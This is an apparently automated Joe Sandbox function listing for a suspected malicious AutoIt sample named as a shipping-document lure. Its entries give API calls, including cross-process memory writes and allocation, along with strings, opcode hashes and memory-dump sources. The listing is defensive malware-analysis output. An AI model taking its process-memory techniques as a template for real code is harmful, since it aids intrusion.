                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00988157
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                • String ID:
                                                                • API String ID: 44706859-0
                                                                • Opcode ID: cae595c21de27f3281cbe6918e8bfc37931f32f01a0aa6bf61af2b0b1cc07913
                                                                • Instruction ID: 1ac45d618b6dca70bfab7882ba4fd026c0bcb146d761f0d6c3d3c4d85c732dfe
                                                                • Opcode Fuzzy Hash: cae595c21de27f3281cbe6918e8bfc37931f32f01a0aa6bf61af2b0b1cc07913
                                                                • Instruction Fuzzy Hash: F1F04FB1258304BFEB116FA9EC9CE673BACEF49764B400529F945C6260CF619941EB70
                                                                Function 0098C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003E9), ref: 0098C1F7
                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0098C20E
                                                                • MessageBeep.USER32(00000000), ref: 0098C226
                                                                • KillTimer.USER32(?,0000040A), ref: 0098C242
                                                                • EndDialog.USER32(?,00000001), ref: 0098C25C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                • String ID:
                                                                • API String ID: 3741023627-0
                                                                • Opcode ID: 4ca97989a565a3eac42738c1d7659f4670ec73f80e47575613f2479ce6281213
                                                                • Instruction ID: 6b335203c28d09e3a1e56488e0bca0e2166963db3323194d7431d99cc0980433
                                                                • Opcode Fuzzy Hash: 4ca97989a565a3eac42738c1d7659f4670ec73f80e47575613f2479ce6281213
                                                                • Instruction Fuzzy Hash: A901DB70414708A7EB206B64DD5EF9677BCFF00B05F000769F952915E0DBF4A9449B50
                                                                Function 009313B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EndPath.GDI32(?), ref: 009313BF
                                                                • StrokeAndFillPath.GDI32(?,?,0096B888,00000000,?), ref: 009313DB
                                                                • SelectObject.GDI32(?,00000000), ref: 009313EE
                                                                • DeleteObject.GDI32 ref: 00931401
                                                                • StrokePath.GDI32(?), ref: 0093141C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                • String ID:
                                                                • API String ID: 2625713937-0
                                                                • Opcode ID: 1fc74e4573419fe3799fe3ec17bbee74783c2b4181ee20f993b2ef70f7e1407c
                                                                • Instruction ID: e6009cac79df54d80ebf7e607a229df06c823d3044641a84c3577417738fe502
                                                                • Opcode Fuzzy Hash: 1fc74e4573419fe3799fe3ec17bbee74783c2b4181ee20f993b2ef70f7e1407c
                                                                • Instruction Fuzzy Hash: BBF0EC3102CB08EBDB155F2AED4C7683FA8AB0137AF098324E529494F1C7358995EF50
                                                                Function 00942CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00950DB6: std::exception::exception.LIBCMT ref: 00950DEC
                                                                  • Part of subcall function 00950DB6: __CxxThrowException@8.LIBCMT ref: 00950E01
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 00937A51: _memmove.LIBCMT ref: 00937AAB
                                                                • __swprintf.LIBCMT ref: 00942ECD
                                                                Strings
                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00942D66
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                • API String ID: 1943609520-557222456
                                                                • Opcode ID: 766f479af42a5e1efeafed62fcd4efaf36e662cfc2d1802a0ea88972c28b424b
                                                                • Instruction ID: 95e29c1fbcf058ecef3a4cc0b2a1f1f9b0dbb34c8d69eca27c5ae6590e03c0f5
                                                                • Opcode Fuzzy Hash: 766f479af42a5e1efeafed62fcd4efaf36e662cfc2d1802a0ea88972c28b424b
                                                                • Instruction Fuzzy Hash: 3A915C721187019FC714EF64C885E6FB7A8EFC6710F40491DF8959B2A2EA30ED48CB52
                                                                Function 0099B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00934750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00934743,?,?,009337AE,?), ref: 00934770
                                                                • CoInitialize.OLE32(00000000), ref: 0099B9BB
                                                                • CoCreateInstance.OLE32(009C2D6C,00000000,00000001,009C2BDC,?), ref: 0099B9D4
                                                                • CoUninitialize.OLE32 ref: 0099B9F1
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                • String ID: .lnk
                                                                • API String ID: 2126378814-24824748
                                                                • Opcode ID: 42ca282f0f6559fd54bc3e4acc2890974aad01f123ea5f815d249a2bc7db96ad
                                                                • Instruction ID: 029014c6f8e1c572d8c51276218f50dff6a559abf0d5d7703d692f9540fbc3f5
                                                                • Opcode Fuzzy Hash: 42ca282f0f6559fd54bc3e4acc2890974aad01f123ea5f815d249a2bc7db96ad
                                                                • Instruction Fuzzy Hash: 72A124756043059FCB00DF18C984E6ABBE5BF89314F148998F8999B3A1CB35EC45CF91
                                                                Function 0095501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __startOneArgErrorHandling.LIBCMT ref: 009550AD
                                                                  • Part of subcall function 009600F0: __87except.LIBCMT ref: 0096012B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ErrorHandling__87except__start
                                                                • String ID: pow
                                                                • API String ID: 2905807303-2276729525
                                                                • Opcode ID: 7ae8384d3357a5b35ad9db6452fe32a5a11015ab6a73bb4a1f7dc3e478b59dfa
                                                                • Instruction ID: 23a027058fc99c14e95103bc8f1e0a31e6cb0d4ffdb494f1dc6e16fbadfc5a02
                                                                • Opcode Fuzzy Hash: 7ae8384d3357a5b35ad9db6452fe32a5a11015ab6a73bb4a1f7dc3e478b59dfa
                                                                • Instruction Fuzzy Hash: A3517E6091C90286DB11F725C8A137F6F989FC1711F218D59E8D9862DBEE388DCC9B82
                                                                Function 00946192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memset$_memmove
                                                                • String ID: ERCP
                                                                • API String ID: 2532777613-1384759551
                                                                • Opcode ID: 3e89aabb23cd3182920902bc16b486420842c1dbbd7fa93eedd1599f64c8f430
                                                                • Instruction ID: ca8b713a45225efcf16f7d9b9661d4e56b1a01eeafce6e4365f546954f4d9fe7
                                                                • Opcode Fuzzy Hash: 3e89aabb23cd3182920902bc16b486420842c1dbbd7fa93eedd1599f64c8f430
                                                                • Instruction Fuzzy Hash: B251B4B1A00705DFDB24DF55C941BAAB7F8EF45304F20496EE85ACB290E774EA44CB41
                                                                Function 009897F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 009914BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00989296,?,?,00000034,00000800,?,00000034), ref: 009914E6
                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0098983F
                                                                  • Part of subcall function 00991487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009892C5,?,?,00000800,?,00001073,00000000,?,?), ref: 009914B1
                                                                  • Part of subcall function 009913DE: GetWindowThreadProcessId.USER32(?,?), ref: 00991409
                                                                  • Part of subcall function 009913DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0098925A,00000034,?,?,00001004,00000000,00000000), ref: 00991419
                                                                  • Part of subcall function 009913DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0098925A,00000034,?,?,00001004,00000000,00000000), ref: 0099142F
                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009898AC
                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009898F9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                • String ID: @
                                                                • API String ID: 4150878124-2766056989
                                                                • Opcode ID: 82cd0168f1549baa9264200431839693dcc4503580e7b35aba17ba7205af3e74
                                                                • Instruction ID: 5965ad66cec2924045ad9b2a9eb5113ef5a9873f0c879dfebba0d8f81e86a1e7
                                                                • Opcode Fuzzy Hash: 82cd0168f1549baa9264200431839693dcc4503580e7b35aba17ba7205af3e74
                                                                • Instruction Fuzzy Hash: A1416E7690021DAFDF10EFA4CD81BEEBBB8EB49300F044199F955B7191DA716E85CBA0
                                                                Function 009B7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,009BF910,00000000,?,?,?,?), ref: 009B79DF
                                                                • GetWindowLongW.USER32 ref: 009B79FC
                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009B7A0C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$Long
                                                                • String ID: SysTreeView32
                                                                • API String ID: 847901565-1698111956
                                                                • Opcode ID: e3a89dd2cb4eb7ff1d41b1769487af678690bfc99c51fa67b2375a338c8c7756
                                                                • Instruction ID: 0fb6f42c6602f01aa7b58cc09748f8d5ebc65739b18a0f5dac1978eb9259342e
                                                                • Opcode Fuzzy Hash: e3a89dd2cb4eb7ff1d41b1769487af678690bfc99c51fa67b2375a338c8c7756
                                                                • Instruction Fuzzy Hash: AE31EF3120820AABDB118F78CD45BEAB7A9EB85334F204725F975A32E0D730ED509B50
                                                                Function 009B73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009B7461
                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009B7475
                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 009B7499
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window
                                                                • String ID: SysMonthCal32
                                                                • API String ID: 2326795674-1439706946
                                                                • Opcode ID: e4d6886d0ecb7748b05b3b2f46c70a5887ee985f37f431beea771f77bc0c1038
                                                                • Instruction ID: 1d48854b15b6a49ac9df035b60a682db2b61f7a58d40ba7c8c4173d4d1e54a4f
                                                                • Opcode Fuzzy Hash: e4d6886d0ecb7748b05b3b2f46c70a5887ee985f37f431beea771f77bc0c1038
                                                                • Instruction Fuzzy Hash: 4C21A332514218BBDF118F94CD46FEA7B7AEF88724F110214FE156B1E0DAB5AC51DBA0
                                                                Function 009B7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 009B7C4A
                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 009B7C58
                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009B7C5F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$DestroyWindow
                                                                • String ID: msctls_updown32
                                                                • API String ID: 4014797782-2298589950
                                                                • Opcode ID: 97d113ea4ef89279e1e51dccd34dbdaaa49f1deb4688bb11149329488b1678b0
                                                                • Instruction ID: 4aa970e6a9586ca2e3494921f38a1929c09db2f482ace232588e5831b29f22c9
                                                                • Opcode Fuzzy Hash: 97d113ea4ef89279e1e51dccd34dbdaaa49f1deb4688bb11149329488b1678b0
                                                                • Instruction Fuzzy Hash: 4A217CB1204208AFDB10DF68DDC1DB67BECEB9A3A4B140559FA119B3A1CB71EC01DB60
                                                                Function 009B6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 009B6D3B
                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 009B6D4B
                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 009B6D70
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$MoveWindow
                                                                • String ID: Listbox
                                                                • API String ID: 3315199576-2633736733
                                                                • Opcode ID: 7918790ea1662010e8ce83bf2799f5ef9cf426975d752c8c5f1c8f29a4fbe3ef
                                                                • Instruction ID: 3201571c54e86bb23a9566df32b525103f54dff7fa8ac1f2e1400b9620ed1b0e
                                                                • Opcode Fuzzy Hash: 7918790ea1662010e8ce83bf2799f5ef9cf426975d752c8c5f1c8f29a4fbe3ef
                                                                • Instruction Fuzzy Hash: 3B217F32610118BFDF118F54CD85FEB3BAEEB89764F018124FA459B1A0CA75AC519BA0
                                                                Function 009B770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009B7772
                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009B7787
                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 009B7794
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: msctls_trackbar32
                                                                • API String ID: 3850602802-1010561917
                                                                • Opcode ID: b5b4f46d48d2244c6445b86463f07b62886ddcf1785403375742aa15e32383b7
                                                                • Instruction ID: f7a3a3fdad01a84f864950b739e7dffac45905fc0340d7359ca08fdcb7e45114
                                                                • Opcode Fuzzy Hash: b5b4f46d48d2244c6445b86463f07b62886ddcf1785403375742aa15e32383b7
                                                                • Instruction Fuzzy Hash: 0511E772254208BEEF205FA5CC45FE7776DEFC9B64F114618FA45960D0C671E811DB10
                                                                Function 00971935 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 00971775
                                                                  • Part of subcall function 009ABFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0097195E,?), ref: 009ABFFE
                                                                  • Part of subcall function 009ABFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 009AC010
                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0097196D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                • String ID: 0`$WIN_XPe
                                                                • API String ID: 582185067-1883032028
                                                                • Opcode ID: e2f827ab4a561f9d6ffc852ccd7d1a873f95b8eb60fa0f8d12878da4ec0f355f
                                                                • Instruction ID: 123fa10c772c5332dbc6c249e08457a62892cfe292cc8ad500205f22ef975a3b
                                                                • Opcode Fuzzy Hash: e2f827ab4a561f9d6ffc852ccd7d1a873f95b8eb60fa0f8d12878da4ec0f355f
                                                                • Instruction Fuzzy Hash: 03F06D72814109DFCB19DBA8CE98BECBBF8BB58300F544495E106B20A0C7344F84DF60
                                                                Function 00934C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00934BD0,?,00934DEF,?,009F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00934C11
                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00934C23
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                • API String ID: 2574300362-3689287502
                                                                • Opcode ID: 1ad38392ffe684a388b182c4f236c0fc69948e9664529616346eb7728d0eb7c5
                                                                • Instruction ID: 028e7535ab407b45b0ed06e09c52d8fb9c4fd7e9225610cd8fa9b8e529991d5a
                                                                • Opcode Fuzzy Hash: 1ad38392ffe684a388b182c4f236c0fc69948e9664529616346eb7728d0eb7c5
                                                                • Instruction Fuzzy Hash: D2D01230525713CFDB205F75DE18646B6E9EF09365F12CC39D4D5D6150E6B0D880CA50
                                                                Function 00934C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00934B83,?), ref: 00934C44
